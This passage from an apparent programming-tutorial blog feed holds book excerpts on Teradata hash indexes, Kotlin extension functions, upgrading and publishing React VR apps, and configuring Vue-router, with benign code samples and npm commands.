(3,'IT','Arjun','sharma','lal',1); INSERT into td_cookbook.EMP_SAL VALUES (4,'SALES','Billa','Suti','raj',2); INSERT into td_cookbook.EMP_SAL VALUES (4,'IT','Koyd','Loud','harlod',1); INSERT into td_cookbook.EMP_SAL VALUES (2,'HR','Harlod','lal','kumar',1); How to do it... You need to connect to the Teradata database using SQLA or Studio. Let's check the explain plan of the following query shown in the figure: /*EXPLAIN of SELECT*/ Explain sel id,emp_Fname from td_cookbook.EMP_SAL; 1) First, we lock td_cookbook.EMP_SAL for read on a reserved RowHash to prevent global deadlock. 2) Next, we lock td_cookbook.EMP_SAL for read. 
3) We do an all-AMPs RETRIEVE step from td_cookbook.EMP_SAL by way of an all-rows scan with no residual conditions into Spool 1 (group_amps), which is built locally on the AMPs. The size of Spool 1 is estimated with high confidence to be 6 rows (210 bytes). The estimated time for this step is 0.04 seconds. 4) Finally, we send out an END TRANSACTION step to all AMPs involved in processing the request. -> The contents of Spool 1 are sent back to the user as the result of statement 1. The total estimated time is 0.04 seconds. Now let's create a hash join index on the EMP_SAL table: /*Hash Indx*/ CREATE HASH INDEX td_cookbook.EMP_HASH_inx (id, DEPT) ON td_cookbook.EMP_SAL BY (id) ORDER BY HASH (id); Let's now check the explain plan on the select query after the hash index creation: /*Select after hash idx*/ EXPLAIN SELCT id,dept from td_cookbook.EMP_SAL 1) First, we lock td_cookbooK.EMP_HASH_INX for read on a reserved RowHash to prevent global deadlock. 2) Next, we lock td_cookbooK.EMP_HASH_INX for read. 3) We do an all-AMPs RETRIEVE step from td_cookbooK.EMP_HASH_INX by way of an all-rows scan with no residual conditions into Spool 1 (group_amps), which is built locally on the AMPs. The size of Spool 1 is estimated with high confidence to be 6 rows (210 bytes). The estimated time for this step is 0.04 seconds. 4) Finally, we send out an END TRANSACTION step to all AMPs involved in processing the request. -> The contents of Spool 1 are sent back to the user as the result of statement 1. The total estimated time is 0.04 seconds. Explain plan can be see in the snippet from SQLA: How it works... Points to consider about the hash index definition are: Each hash index row contains the department id and the department name. Specifying the department id is unnecessary, since it is the primary index of the base table and will therefore be automatically included. The BY clause indicates that the rows of this index will be distributed by the department id hash value. The ORDER BY clause indicates that the index rows will be ordered on each AMP in sequence by the department id hash value. The column specified in the BY clause should be part of the columns which make up the hash index. The BY clause comes with the ORDER BY clause. Unlike join indexes, hash indexes can only be on a single table. We explored how to create different types of index to bring up maximum performance in your database queries. If this article made your way, do check out the book Teradata Cookbook and gain confidence in running a wide variety of Data analytics to develop applications for the Teradata environment. Why MongoDB is the most popular NoSQL database today Why Oracle is losing the Database Race Using the Firebase Real-Time Database  
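A closing housekeeping note for the recipes above: join and hash indexes occupy permanent space and are maintained on every insert, update, and delete against the base table, so once you have finished experimenting it is worth removing them. A possible cleanup sketch, using the object names from this article:

/* Sketch: drop the demo indexes created in this article */
DROP HASH INDEX td_cookbook.EMP_HASH_inx;
DROP JOIN INDEX td_cookbook.EMP_JI;

/* The volatile tables (EMP_SAL_PPI, EMP_SAL_NONPPI) disappear on their own
   when the session ends, so they need no explicit cleanup */

The partitioned tables in the first recipe were created as volatile, which is why only the permanent index objects need an explicit DROP.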

Extension functions in Kotlin: everything you need to know

Aaron Lazar
08 Jun 2018
8 min read
Kotlin is a rapidly rising programming language. It offers developers the simplicity and effectiveness to develop robust and lightweight applications. Kotlin offers great functional programming support, and one of the best features of Kotlin in this respect are extension functions, hands down! Extension functions are great, because they let you modify existing types with new functions. This is especially useful when you're working with Android and you want to add extra functions to the framework classes. In this article, we'll see what Extension functions are and how the're a blessing in disguise! This article has been extracted from the book, Functional Kotlin, by Mario Arias and Rivu Chakraborty. The book bridges the language gap for Kotlin developers by showing you how to create and consume functional constructs in Kotlin. fun String.sendToConsole() = println(this) fun main(args: Array<String>) { "Hello world! (from an extension function)".sendToConsole() } To add an extension function to an existing type, you must write the function's name next to the type's name, joined by a dot (.). In our example, we add an extension function (sendToConsole()) to the String type. Inside the function's body, this refers the instance of String type (in this extension function, string is the receiver type). Apart from the dot (.) and this, extension functions have the same syntax rules and features as a normal function. Indeed, behind the scenes, an extension function is a normal function whose first parameter is a value of the receiver type. So, our sendToConsole() extension function is equivalent to the next code: fun sendToConsole(string: String) = println(string) sendToConsole("Hello world! (from a normal function)") So, in reality, we aren't modifying a type with new functions. Extension functions are a very elegant way to write utility functions, easy to write, very fun to use, and nice to read—a win-win. This also means that extension functions have one restriction—they can't access private members of this, in contrast with a proper member function that can access everything inside the instance: class Human(private val name: String) fun Human.speak(): String = "${this.name} makes a noise" //Cannot access 'name': it is private in 'Human' Invoking an extension function is the same as a normal function—with an instance of the receiver type (that will be referenced as this inside the extension), invoke the function by name. Extension functions and inheritance There is a big difference between member functions and extension functions when we talk about inheritance. The open class Canine has a subclass, Dog. A standalone function, printSpeak, receives a parameter of type Canine and prints the content of the result of the function speak(): String: open class Canine { open fun speak() = "<generic canine noise>" } class Dog : Canine() { override fun speak() = "woof!!" } fun printSpeak(canine: Canine) { println(canine.speak()) } Open classes with open methods (member functions) can be extended and alter their behavior. Invoking the speak function will act differently depending on which type is your instance. The printSpeak function can be invoked with any instance of a class that is-a Canine, either Canine itself or any subclass: printSpeak(Canine()) printSpeak(Dog()) If we execute this code, we can see this on the console: Although both are Canine, the behavior of speak is different in both cases, as the subclass overrides the parent implementation. 
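The member-function example above is small enough to run as a single .kt file; here is a self-contained sketch with the expected console output noted in comments (it follows directly from the override in Dog):

// Member functions dispatch dynamically: the runtime type decides which speak() runs
open class Canine {
    open fun speak() = "<generic canine noise>"
}

class Dog : Canine() {
    override fun speak() = "woof!!"
}

fun printSpeak(canine: Canine) {
    println(canine.speak())
}

fun main(args: Array<String>) {
    printSpeak(Canine())  // prints: <generic canine noise>
    printSpeak(Dog())     // prints: woof!!
}

Keep this file around; swapping the member functions for the extension-function version that follows is a quick way to see the difference in dispatch for yourself.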
But with extension functions, many things are different. As with the previous example, Feline is an open class extended by the Cat class. But speak is now an extension function: open class Feline fun Feline.speak() = "<generic feline noise>" class Cat : Feline() fun Cat.speak() = "meow!!" fun printSpeak(feline: Feline) { println(feline.speak()) } Extension functions don't need to be marked as override, because we aren't overriding anything: printSpeak(Feline()) printSpeak(Cat() If we execute this code, we can see this on the console: In this case, both invocations produce the same result. Although in the beginning, it seems confusing, once you analyze what is happening, it becomes clear. We're invoking the Feline.speak() function twice; this is because each parameter that we pass is a Feline to the printSpeak(Feline) function: open class Primate(val name: String) fun Primate.speak() = "$name: <generic primate noise>" open class GiantApe(name: String) : Primate(name) fun GiantApe.speak() = "${this.name} :<scary 100db roar>" fun printSpeak(primate: Primate) { println(primate.speak()) } printSpeak(Primate("Koko")) printSpeak(GiantApe("Kong")) If we execute this code, we can see this on the console: In this case, it is still the same behavior as with the previous examples, but using the right value for name. Speaking of which, we can reference name with name and this.name; both are valid. Extension functions as members Extension functions can be declared as members of a class. An instance of a class with extension functions declared is called the dispatch receiver. The Caregiver open class internally defines, extension functions for two different classes, Feline and Primate: open class Caregiver(val name: String) { open fun Feline.react() = "PURRR!!!" fun Primate.react() = "*$name plays with ${this@Caregiver.name}*" fun takeCare(feline: Feline) { println("Feline reacts: ${feline.react()}") } fun takeCare(primate: Primate){ println("Primate reacts: ${primate.react()}") } } Both extension functions are meant to be used inside an instance of Caregiver. Indeed, it is a good practice to mark member extension functions as private, if they aren't open. In the case of Primate.react(), we are using the name value from Primate and the name value from Caregiver. To access members with a name conflict, the extension receiver (this) takes precedence and to access members of the dispatcher receiver, the qualified this syntax must be used. Other members of the dispatcher receiver that don't have a name conflict can be used without qualified this. Don't get confused by the various means of this that we have already covered: Inside a class, this means the instance of that class Inside an extension function, this means the instance of the receiver type like the first parameter in our utility function with a nice syntax: class Dispatcher { val dispatcher: Dispatcher = this fun Int.extension(){ val receiver: Int = this val dispatcher: Dispatcher = this@Dispatcher } } Going back to our Zoo example, we instantiate a Caregiver, a Cat, and a Primate, and we invoke the function Caregiver.takeCare with both animal instances: val adam = Caregiver("Adam") val fulgencio = Cat() val koko = Primate("Koko") adam.takeCare(fulgencio) adam.takeCare(koko) If we execute this code, we can see this on the console: Any zoo needs a veterinary surgeon. 
The class Vet extends Caregiver: open class Vet(name: String): Caregiver(name) { override fun Feline.react() = "*runs away from $name*" } We override the Feline.react() function with a different implementation. We are also using the Vet class's name directly, as the Feline class doesn't have a property name: val brenda = Vet("Brenda") listOf(adam, brenda).forEach { caregiver -> println("${caregiver.javaClass.simpleName} ${caregiver.name}") caregiver.takeCare(fulgencio) caregiver.takeCare(koko) } After which, we get the following output: Extension functions with conflicting names What happens when an extension function has the same name as a member function? The Worker class has a function work(): String and a private function rest(): String. We also have two extension functions with the same signature, work and rest: class Worker { fun work() = "*working hard*" private fun rest() = "*resting*" } fun Worker.work() = "*not working so hard*" fun <T> Worker.work(t:T) = "*working on $t*" fun Worker.rest() = "*playing video games*" Having extension functions with the same signature isn't a compilation error, but a warning: Extension is shadowed by a member: public final fun work(): String It is legal to declare a function with the same signature as a member function, but the member function always takes precedence, therefore, the extension function is never invoked. This behavior changes when the member function is private, in this case, the extension function takes precedence. It is also possible to overload an existing member function with an extension function: val worker = Worker() println(worker.work()) println(worker.work("refactoring")) println(worker.rest()) On execution, work() invokes the member function and work(String) and rest() are extension functions: Extension functions for objects In Kotlin, objects are a type, therefore they can have functions, including extension functions (among other things, such as extending interfaces and others). We can add a buildBridge extension function to the object, Builder: object Builder { } fun Builder.buildBridge() = "A shinny new bridge" We can include companion objects. The class Designer has two inner objects, the companion object and Desk object: class Designer { companion object { } object Desk { } } fun Designer.Companion.fastPrototype() = "Prototype" fun Designer.Desk.portofolio() = listOf("Project1", "Project2") Calling this functions works like any normal object member function: Designer.fastPrototype() Designer.Desk.portofolio().forEach(::println) So there you have it! You now know how to take advantage of extension functions in Kotlin. If you found this tutorial helpful and would like to learn more, head on over to purchase the full book, Functional Kotlin, by Mario Arias and Rivu Chakraborty. Forget C and Java. Learn Kotlin: the next universal programming language 5 reasons to choose Kotlin over Java Building chat application with Kotlin using Node.js, the powerful Server-side JavaScript platform

Upgrading, packaging, and publishing your React VR app

Sunith Shetty
08 Jun 2018
19 min read
It is fun to develop and experience virtual worlds at home. Eventually, though, you want the world to see your creation. To do that, we need to package and publish our app. In the course of development, upgrades to React may come along; before publishing, you will need to decide whether you need to "code freeze" and ship with a stable version, or upgrade to a new version. This is a design decision. In today’s tutorial, we will learn to upgrade React VR and bundle the code in order to publish on the web. This article is an excerpt from a book written by John Gwinner titled Getting Started with React VR. This book will get you well-versed with Virtual Reality (VR) and React VR components to create your own VR apps. One of the neat things, although it can be frustrating, is that web projects are frequently updated.  There are a couple of different ways to do an upgrade: You can install/create a new app with the same name You will then go to your old app and copy everything over This is a facelift upgrade or Rip and Replace Do an update. Mostly, this is an update to package.json, and then delete node_modules and rebuild it. This is an upgrade in place. It is up to you which method you use, but the major difference is that an upgrade in place is somewhat easier—no source code to modify and copy—but it may or may not work. A Facelift upgrade also relies on you using the correct react-vr-cli. There is a notice that runs whenever you run React VR from the Command Prompt that will tell you whether it's old: The error or warning that comes up about an upgrade when you run React VR from a Command Prompt may fly by quickly. It takes a while to run, so you may go away for a cup of coffee. Pay attention to red lines, seriously. To do an upgrade in place, you will typically get an update notification from Git if you have subscribed to the project. If you haven't, you should go to: http://bit.ly/ReactVR, create an account (if you don't have one already), and click on the eyeball icon to join the watch list. Then, you will get an email every time there is an upgrade. We will cover the most straightforward way to do an upgrade—upgrade in place, first. Upgrading in place How do you know what version of React you have installed? From a Node.js prompt, type this: npm list react-vr Also, check the version of react-vr-web: npm list react-vr-web Check the version of react-vr-cli (the command-line interface, really only for creating the hello world app). npm list react-vr-cli Check the version of ovrui (open VR's user interface): npm list ovrui You can check these against the versions on the documentation. If you've subscribed to React VR on GitHub (and you should!), then you will get an email telling you that there is an upgrade. Note that the CLI will also tell you if it is out of date, although this only applies when you are creating a new application (folder/website). The release notes are at: http://bit.ly/VRReleases . There, you will find instructions to upgrade. The upgrade instructions usually have you do the following: Delete your node_modules directory. Open your package.json file. Update react-vr, react-vr-web, and ovrui to "New version number" for example, 2.0.0. Update react to "a.b.c". Update react-native to "~d.e.f". Update three to "^g.h.k". Run npm install or yarn. Note the ~ and ^ symbols; ~version means approximately equivalent to version and ^version means compatible with version. 
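If you want to check what a given ~ or ^ range will actually accept before you run the install, you can ask the semver package (the range-matching library that npm itself uses) from a short Node.js script. A quick sketch, assuming you have installed it with npm install semver:

// check-ranges.js - sanity-check ~ and ^ version ranges before upgrading
const semver = require('semver');

// ~2.0.0 accepts patch releases within 2.0.x only
console.log(semver.satisfies('2.0.5', '~2.0.0')); // true
console.log(semver.satisfies('2.1.0', '~2.0.0')); // false

// ^0.87.0 looks permissive, but with a 0.x major it only allows 0.87.x
console.log(semver.satisfies('0.87.4', '^0.87.0')); // true
console.log(semver.satisfies('0.88.0', '^0.87.0')); // false

Run it with node check-ranges.js; a false where you expected true usually explains why an upgrade in place pulled in something older (or newer) than you intended.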
This is a help, as you may have other packages that may want other versions of react-native and three, specifically. To get the values of {a...k}, refer to the release notes. I have also found that you may need to include these modules in the devDependencies section of package.json: "react-devtools": "^2.5.2", "react-test-renderer": "16.0.0", You may see this error: module.js:529 throw err; ^ Error: Cannot find module './node_modules/react-native/packager/blacklist' If you do, make the following changes in your projects root folder in the rncli.config.js file. Replace the var blacklist = require('./node_modules/react-native/packager/blacklist'); line with var blacklist = require('./node_modules/metro-bundler/src/blacklist');. Third-party dependencies If you have been experimenting and adding modules with npm install <something>, you may find, after an upgrade, that things do not work. The package.json file also needs to know about all the additional packages you installed during experimentation. This is the project way (npm way) to ensure that Node.js knows we need a particular piece of software. If you have this issue, you'll need to either repeat the install with the—save parameter, or edit the dependencies section in your package.json file. { "name": "WalkInAMaze", "version": "0.0.1", "private": true, "scripts": { "start": "node -e "console.log('open browser at http://localhost:8081/vr/\n\n');" && node node_modules/react-native/local-cli/cli.js start", "bundle": "node node_modules/react-vr/scripts/bundle.js", "open": "node -e "require('xopen')('http://localhost:8081/vr/')"", "devtools": "react-devtools", "test": "jest" }, "dependencies": { "ovrui": "~2.0.0", "react": "16.0.0", "react-native": "~0.48.0", "three": "^0.87.0", "react-vr": "~2.0.0", "react-vr-web": "~2.0.0", "mersenne-twister": "^1.1.0" }, "devDependencies": { "babel-jest": "^19.0.0", "babel-preset-react-native": "^1.9.1", "jest": "^19.0.2", "react-devtools": "^2.5.2", "react-test-renderer": "16.0.0", "xopen": "1.0.0" }, "jest": { "preset": "react-vr" } } Again, this is the manual way; a better way is to use npm install <package> -save. The -s qualifier saves the new package you've installed in package.json. The manual edits can be handy to ensure that you've got the right versions if you get a version mismatch. If you mess around with installing and removing enough packages, you will eventually mess up your modules. If you get errors even after removing node_modules, issue these commands: npm cache clean --force npm start -- --reset-cache The cache clean won't do it by itself; you need the reset-cache, otherwise, the problem packages will still be saved, even if they don't physically exist! Really broken upgrades – rip and replace If, however, after all that work, your upgrade still does not work, all is not lost. We can do a rip and replace upgrade. Note that this is sort of a "last resort", but it does work fairly well. Follow these steps: Ensure that your react-vr-cli package is up to date, globally: [F:ReactVR]npm install react-vr-cli -g C:UsersJohnAppDataRoamingnpmreact-vr -> C:UsersJohnAppDataRoamingnpmnode_modulesreact-vr-cliindex.js + react-vr-cli@0.3.6 updated 8 packages in 2.83s This is important, as when there is a new version of React, you may not have the most up-to-date react-vr-cli. It will tell you when you use it that there is a newer version out, but that line frequently scrolls by; if you get bored and don't note, you can spend a lot of time trying to install an updated version, to no avail. 
An npm generates a lot of verbiage, but it is important to read what it says, especially red formatted lines. Ensure that all CLI (DOS) windows, editing sessions, Node.js running CLIs, and so on, are closed. (You shouldn't need to reboot, however; just close everything using the old directory). Rename the old code to MyAppName140 (add a version number to the end of the old react-vr directory). Create the application, using react-vr init MyAppName, in other words, the original app name. The next step is easiest using a diff program (refer to http://bit.ly/WinDiff). I use Beyond Compare, but there are other ones too. Choose one and install it, if needed. Compare the two directories, .MyAppName (new) and .MyAppName140, and see what files have changed. Move over any new files from your old app, including assets (you can probably copy over the entire static_assets folder). Merge any files that have changed, except package.json. Generally, you will need to merge these files: index.vr.js client.js (if you changed it) For package.json, see what lines have been added, and install those packages in the new app via npm install <missed package> --save, or start the app and see what is missing. Remove any files seeded by the hello world app, such as chess-world.jpg (unless you are using that background, of course). Usually, you don't change the rn-cli.config.js file (unless you modified the seeded version). Most code will move directly over. Ensure that you change the application name if you changed the directory name, but with the preceding directions, you won't have to. The preceding list of upgrade steps may be slightly easier if there are massive changes to React VR; it will require some picking through source files. The source is pretty straightforward, so this should be easy in practice. I found that these techniques will work best if the automatic upgrade did not work. As mentioned earlier, the time to do a major upgrade probably is not right before publishing the app, unless there is some new feature you need. You want to adequately test your app to ensure that there aren't any bugs. I'm including the upgrade steps here, though, but not because you should do it right before publishing. Getting your code ready to publish Honestly, you should never put off organizing your clothes until, oh, wait, we're talking about code. You should never put off organizing your code until the night you want to ship it. Even the code you think is throw away may end up in production. Learn good coding habits and style from the beginning. Good code organization Good code, from the very start, is very important for many reasons: If your code uses sloppy indentation, it's more difficult to read. Many code editors, such as Visual Studio Code, Atom, and Webstorm, will format code for you, but don't rely on these tools. Poor naming conventions can hide problems. An improper case on variables can hide problems, such as using this.State instead of this.state. Most of the time spent coding, as much as 80%, is in maintenance. If you can't read the code, you can't maintain it. When you're a starting out programmer, you frequently think you'll always be able to read your own code, but when you pick up a piece years later and say "Who wrote this junk?" and then realize it was you, you will quit doing things like a, b, c, d variable names and the like. Most software at some point is maintained, read, copied, or used by someone other than the author. 
Most programmers think code standards are for "the other guy," yet complain when they have to code well. Who then does? Most programmers will immediately ask for the code documentation and roll their eyes when they don't find it. I usually ask to see the documentation they wrote for their last project. Every programmer I've hired usually gives me a deer in the headlights look. This is why I usually require good comments in the code. A good comment is not something like this: //count from 99 to 1 for (i=99; i>0; i--) ... A good comment is this: //we are counting bottles of beer for (i=99; i>0; i--) ... Cleaning the lint trap (checking code standards) When you wash clothes, the lint builds up and will eventually clog your washing machine or dryer, or cause a fire. In the PC world, old code, poorly typed names, and all can also build up. Refactoring is one way to clean up the code. I highly recommend that you use some form of version control, such as Git or bitbucket to check your code; while refactoring, it's quite possible to totally mess up your code and if you don't use version control, you may lose a lot of work. A great way to do a code review of your work, before you publish, is to use a linter. Linters go through your code and point out problems (crud), improper syntax, things that may work differently than you intend, and generally try to pick up your room after you, like your mom does. While you might not like it if your mom does that, these tools are invaluable. Computers are, after all, very picky and why not use the machines against each other? One of the most common ways to let software check your software for JavaScript is a program called ESLint. You can read about it at: http://bit.ly/JSLinter. To install ESLint, you can do it via npm like most packages—npm install eslint --save-dev. The --save-dev option puts a requirement in your project while you are developing. Once you've published your app, you won't need to pack the ESLint information with your project! There are a number of other things you need to get ESLint to work properly; read the configuration pages and go through the tutorials. A lot depends on what IDE you use. You can use ESLint with Visual Studio, for example. Once you've installed ESLint, you need to configure a local configuration file. Do this with eslint --init. The --init command will display a prompt that will ask you how to configure the rules it will follow. It will ask a series of questions, and ask what style to use. AirBNB is fairly common, although you can use others; there's no wrong choice. If you are working for a company, they may already have standards, so check with management. One of the prompts will ask if you need React. React VR coding style Coding style can be nearly religious, but in the JavaScript and React world, some standards are very common. AirBNB has one good, fairly well–regarded style guide at: http://bit.ly/JStyle. For React VR, some style options to consider are as follows: Use lowercase for the first letter of a variable name. In other words, this.props.currentX, not this.props.CurrentX, and don't use underscores (this is called camelCase). Use PascalCase only when naming constructors or classes. As you're using PascalCase for files, make the filename match the class, so   import MyClass from './MyClass'. Be careful about 0 vs {0}. In general, learn JavaScript and React. Always use const or let to declare variables to avoid polluting the global namespace. Avoid using ++ and --. 
This one was hard for me, being a C++ programmer. Hopefully, by the time you've read this, I've fixed it in the source examples. If not, do as I say, not as I do! Learn the difference between == and ===, and use them properly, another thing that is new for C++ and C# programmers. In general, I highly recommend that you pour over these coding styles and use a linter when you write your code: Third-party dependencies For your published website/application to really work reliably, we also need to update package.json; this is sort of the "project" way to ensure that Node.js knows we need a particular piece of software. We will edit the "dependencies" section to add the last line,(bold emphasis mine, bold won't show up in a text editor, obviously!): { "name": "WalkInAMaze", "version": "0.0.1", "private": true, "scripts": { "start": "node -e "console.log('open browser at http://localhost:8081/vr/\n\n');" && node node_modules/react-native/local-cli/cli.js start", "bundle": "node node_modules/react-vr/scripts/bundle.js", "open": "node -e "require('xopen')('http://localhost:8081/vr/')"", "devtools": "react-devtools", "test": "jest" }, "dependencies": { "ovrui": "~2.0.0", "react": "16.0.0", "react-native": "~0.48.0", "three": "^0.87.0", "react-vr": "~2.0.0", "react-vr-web": "~2.0.0", "mersenne-twister": "^1.1.0" }, "devDependencies": { "babel-jest": "^19.0.0", "babel-preset-react-native": "^1.9.1", "jest": "^19.0.2", "react-devtools": "^2.5.2", "react-test-renderer": "16.0.0", "xopen": "1.0.0" }, "jest": { "preset": "react-vr" } } This is the manual way; a better way is to use npm install <package> -s. The -s qualifier saves the new package you've installed in package.json. The manual edits can be handy to ensure that you've got the right versions, if you get a version mismatch. If you mess around with installing and removing enough packages, you will eventually mess up your modules. If you get errors, even after removing node_modules, issue these commands: npm start -- --reset-cache npm cache clean --force The cache clean won't do it by itself; you need the reset–cache, otherwise the problem packages will still be saved, even if they don't physically exist! Bundling for publishing on the web Assuming that you have your project dependencies set up correctly to get your project to run from a web server, typically through an ISP or service provider, you need to "bundle" it. React VR has a script that will package up everything into just a few files. Note, of course, that your desktop machine counts as a "web server", although I wouldn't recommend that you expose your development machine to the web. The better way to have other people experience your new Virtual Reality is to bundle it and put it on a commercial web service. Packaging React VR for release on a website The basic process is easy with the React VR provided script: Go to the VR directory where you normally run npm start, and run the npm run bundle command: You will then go to your website the same way you normally upload files, and create a directory called vr. In your project directory, in our case f:ReactVRWalkInAMaze, find the following files in .VRBuild: client.bundle.js index.bundle.js Copy those to your website. Make a directory called static_assets. Copy all of your files (that your app uses) from AppNamestatic_assets to the new static_assets folder. Ensure that you have MIME mapping set up for all of your content; in particular, .obj, .mtl, and .gltf files may need new mappings. 
Check with your web server documentation: For gltf files, use model/gltf-binary Any .bin files used by gltf should be application/octet-stream For .obj files, I've used application/octet-stream The official list is at http://bit.ly/MimeTypes Very generally, application/octet-stream will send the files "exactly" as they are on the server, so this is sort of a general purpose "catch all" Copy the index.html from the root of your application to the directory on your website where you are publishing the app; in our case, it'll be the vr directory, so the file is alongside the two .js files. Modify index.html for the following lines (note the change to ./index.vr): <html> <head> <title>WalkInAMaze</title> <style>body { margin: 0; }</style> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> </head> <body> <!-- When you're ready to deploy your app, update this line to point to your compiled client.bundle.js --> <script src="./client.bundle?platform=vr"></script> <script> // Initialize the React VR application ReactVR.init( // When you're ready to deploy your app, update this line to point to // your compiled index.bundle.js './index.vr.bundle?platform=vr&dev=false', // Attach it to the body tag document.body ); </script> </body> </html> Note for a production release, which means if you're pointing to a prebuilt bundle on a static web server and not the React Native bundler, the dev and platform flags actually won't do anything, so there's no difference between dev=true, dev=false, or even dev=foobar. Obtaining releases and attribution If you used any assets from anywhere on the web, ensure that you have the proper release. For example, many Daz3D or Poser models do not include the rights to publish the geometry information; including these on your website as an OBJ or glTF file may be a violation of that agreement. Someone could easily download the model, or nearly all the geometry fairly easily, and then use it for something else. I am not a lawyer; you should check with wherever you get your models to ensure that you have permission, and if necessary, attribute properly. Attribution licenses are a little difficult with a VR world, unless you embed the attribution into a graphic somewhere; as we've seen, adding text can sometimes be distracting, and you will always have scale issues. If you embed a VR world in a page with <iframe>, you can always give proper attribution on the HTML side. However, this isn't really VR. Checking image sizes and using content delivery sites Some of the images you use, especially the ones in a <pano> statement, can be quite large. You may need to optimize these for proper web speed and responsiveness. This is a fairly general topic, but one thing that can help is a content delivery network (CDN), especially if your world will be a high-volume one. Adding a CDN to your web server is easy. You host your asset files from a separate location, and you pass the root directory as the assetRoot at the ReactVR.init() call. For example, if your files were hosted at https://cdn.example.com/vr_assets/, you would change the method call in index.html to include the following third argument: ReactVR.init( './index.bundle.js?platform=vr&dev=false', document.body, { assetRoot: 'https://cdn.example.com/vr_assets/' } ); Optimizing your models If you were watching the web console, you may have noted this model being loaded over and over. It is not necessarily the most efficient way. 
Consider other techniques such as passing a model for the various child components as a prop. Polygon decimation is another technique that is very valuable in optimizing models for the web and VR. With the glTF file format, you can use "normal maps" and still make a low polygon model look like a high-resolution one. Techniques to do this are well documented in the game development field. These techniques really do work well. You should also optimize models to not display unseen geometry. If you are showing a car model with blacked out windows, for example, there is no need to have engine detail and interior details loaded (unless the windows are transparent). This sounds obvious, although I found the lamp that I used to illustrate the lighting examples had almost tripled the number of polygons than was needed; the glass lamp shade had inner and outer polygons that were inside the model. We learned to do version upgrades, and if need be, how to do rip and replace upgrades. We further discussed when to do an upgrade and how to publish it on the web. If you are interested to know about how to include existing high-performance web code into a VR app, you may refer to the book Getting Started with React VR.   Build a Virtual Reality Solar System in Unity for Google Cardboard Understanding the hype behind Magic Leap’s New Augmented Reality Headsets Leap Motion open sources its $100 augmented reality headset, North Star

Working with the Vue-router plugin for SPAs

Pravin Dhandre
07 Jun 2018
5 min read
Single-Page Applications (SPAs) are web applications that load a single HTML page and updates that page dynamically based on the user interaction with the app. These SPAs use AJAX and HTML5 for creating fluid and responsive web applications without any requirement of constant page reloads. In this tutorial, we will show a step-by-step approach of how to install an extremely powerful plugin Vue-router to build Single Page Applications. This article is an excerpt from a book written by Mike Street, titled Vue.js 2.x by Example. Similar to how you add Vue and Vuex to your applications, you can either directly include the library from unpkg, or head to the following URL and download a local copy for yourself: https://unpkg.com/Vue-router. Add the JavaScript to a new HTML document, along with Vue, and your application's JavaScript. Create an application container element, your view, as well. In the following example, I have saved the Vue-router JavaScript file as router.js: Initialize VueRouter in your JavaScript application We are now ready to add VueRouter and utilize its power. Before we do that, however, we need to create some very simple components which we can load and display based on the URL. As we are going to be loading the components with the router, we don't need to register them with Vue.component, but instead create JavaScript objects with the same properties as we would a Vue component. For this first exercise, we are going to create two pages—Home and About pages. Found on most websites, these should help give you context as to what is loading where and when. Create two templates in your HTML page for us to use: Don't forget to encapsulate all your content in one "root" element (represented here by the wrapping div tags). You also need to ensure you declare the templates before your application JavaScript is loaded. We've created a Home page template, with the id of homepage, and an About page, containing some placeholder text from lorem ipsum, with the id of about. Create two components in your JavaScript which reference these two templates: The next step is to give the router a placeholder to render the components in the view. This is done by using a custom <router-view> HTML element. Using this element gives you control over where your content will render. It allows us to have a header and footer right in the app view, without needing to deal with messy templates or include the components themselves. Add a header, main, and footer element to your app. Give yourself a logo in the header and credits in the footer; in the main HTML element, place the router-view placeholder: Everything in the app view is optional, except the router-view, but it gives you an idea of how the router HTML element can be implemented into a site structure. The next stage is to initialize the Vue-router and instruct Vue to use it. Create a new instance of VueRouter and add it to the Vue instance—similar to how we added Vuex in the previous section: We now need to tell the router about our routes (or paths), and what component it should load when it encounters each one. Create an object inside the Vue-router instance with a key of routes and an array as the value. This array needs to include an object for each route: Each route object contains a path and component key. The path is a string of the URL that you want to load the component on. Vue-router serves up components based on a first-come-first-served basis. 
For example, if there are several routes with the same path, the first one encountered is used. Ensure each route has the beginning slash—this tells the router it is a root page and not a sub-page. Press save and view your app in the browser. You should be presented with the content of the Home template component. If you observe the URL, you will notice that on page load a hash and forward slash (#/) are appended to the path. This is the router creating a method for browsing the components and utilizing the address bar. If you change this to the path of your second route, #/about, you will see the contents of the About component. Vue-router is also able to use the JavaScript history API to create prettier URLs. For example, yourdomain.com/index.html#about would become yourdomain.com/about. This is activated by adding mode: 'history' to your VueRouter instance: With this, you should now be familiar with Vue-router and how to initialize it for creating new routes and paths for different web pages on your website. Do check out the book Vue.js 2.x by Example to start developing building blocks for a successful e-commerce website. What is React.js and how does it work? Why has Vue.js become so popular? Building a real-time dashboard with Meteor and Vue.js
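To tie the steps above together, here is a minimal single-page sketch: two templates, two plain component objects, a VueRouter instance with two routes, and the router-view placeholder. It assumes Vue 2 with the libraries saved locally as vue.js and router.js, as described at the start of the tutorial; the template markup, logo filename, and footer text are placeholder details rather than anything prescribed by the article:

<!-- index.html (sketch) -->
<div id="app">
  <header><img src="logo.png" alt="logo"></header>
  <main>
    <router-view></router-view>
  </main>
  <footer>Credits go here</footer>
</div>

<script type="text/x-template" id="homepage">
  <div><h1>Home</h1><p>Welcome to the home page.</p></div>
</script>
<script type="text/x-template" id="about">
  <div><h1>About</h1><p>Lorem ipsum dolor sit amet.</p></div>
</script>

<script src="vue.js"></script>
<script src="router.js"></script>
<script>
  // Plain objects with the same shape as Vue components; no Vue.component needed
  var Home  = { template: '#homepage' };
  var About = { template: '#about' };

  // First-come-first-served: the first route whose path matches is used
  var router = new VueRouter({
    // mode: 'history', // drops the #/ prefix if your server serves index.html for all paths
    routes: [
      { path: '/',      component: Home },
      { path: '/about', component: About }
    ]
  });

  new Vue({
    el: '#app',
    router: router
  });
</script>

Opening the page should show the Home template at #/ and the About template at #/about, exactly as described above.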

8 Reasons why architects love API driven architecture

Aaron Lazar
07 Jun 2018
6 min read
